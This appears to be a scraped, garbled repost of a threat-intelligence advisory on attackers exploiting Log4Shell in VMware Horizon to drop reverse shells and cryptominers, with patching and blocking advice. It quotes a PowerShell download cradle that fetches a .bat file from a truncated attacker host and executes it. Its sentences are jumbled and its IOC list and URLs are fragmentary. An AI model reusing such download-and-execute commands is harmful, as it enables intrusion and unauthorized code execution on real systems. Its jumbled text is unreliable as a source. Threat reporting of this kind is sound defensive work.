![]() The download cradle has also been used by one unknown actor to deploy a reverse shell based on Invoke-WebRev ( ) from 221:443/dd.ps1. $wc = New-Object $tempfile = ::GetTempFileName() $tempfile += '.bat' $wc.DownloadFile('135/mad_micky.bat', $tempfile) & $tempfile The following is an example PowerShell command from this activity (note that these contents were originally base64 encoded): TIDE has observed the attacker downloading cryptocurrency miners from the following URLs: The most common activity sees the attacker executing PowerShell and using the built-in object to download cryptocurrency mining software to the system. Rapid7's Threat Intelligence and Detection Engineering (TIDE) team has identified five unique avenues that attackers have taken post-exploitation, indicating that multiple actors are involved in this mass exploitation activity. Organizations are advised to proactively block traffic to the IPs/URLs listed in the IOCs section. As a general practice, Rapid7 recommends never exposing VMware Horizon to the public internet, only allowing access behind a VPN. Patch Immediately: Organizations that still have a vulnerable version of VMware Horizon in their environment should update to a patched version of Horizon on an emergency basis and review the system(s) for signs of compromise. We have a dedicated resource page for the Log4j vulnerability, which includes our AttackerKB analysis of Log4Shell containing a proof-of-concept exploit for VMware Horizon. Rapid7 researchers are currently evaluating the feasibility of adding a VMware Horizon vulnerability check for Nexpose/InsightVM.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |